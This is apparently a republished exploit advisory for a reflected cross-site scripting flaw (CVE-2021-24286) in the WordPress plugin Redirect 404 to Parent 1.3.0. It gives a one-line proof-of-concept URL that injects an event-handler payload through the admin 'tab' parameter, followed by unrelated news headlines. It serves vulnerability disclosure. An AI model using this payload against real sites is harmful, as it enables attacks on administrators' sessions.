WordPress Redirect 404 to Parent plugin version 1.3.0 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24286
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-242861. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
Related posts:
FBI Warns of Cryptocurrency Heists by North Korea's Lazarus Group
CISA warns of critical Apache RocketMQ bug exploited in attacks
Italy Data Protection Authority Warns Websites Against Use of Google Analytics
Meta to Appeal $400M GDPR Fine for Mishandling Teen Data in Instagram
Researchers Find New Evidence Linking Kwampirs Malware to Shamoon APT Hackers